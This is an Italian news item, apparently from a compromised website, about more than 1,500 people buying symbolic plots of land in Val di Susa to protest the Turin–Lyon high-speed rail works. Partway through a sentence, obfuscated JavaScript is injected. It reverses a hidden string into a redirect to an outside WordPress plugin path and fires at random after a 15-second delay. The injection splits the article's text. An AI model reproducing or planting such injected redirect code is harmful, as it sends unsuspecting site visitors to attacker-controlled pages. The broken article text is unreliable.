Val di Susa, i No-Tav rilanciano

image_pdfimage_print

Sono oltre 1.500 da tutta Italia le persone che hanno aderito a “Compra un posto in prima fila”, l’iniziativa lanciata dai comitati No-Tav della Val di Susa per acquistare i terreni dove avverranno le trivellazioni per la linea ad alta velocità Torino-Lione. 15 euro il costo di un metro quadro di terreno per un’azione di protesta nonviolenta che non impedisce, ma rende simbolicamente più difficoltoso l’esproprio per i lavori. A Torino in centinaia si sono ritrovati dal notaio per ratificare gli acquisti, riport (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ando l’interesse sulla questione.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *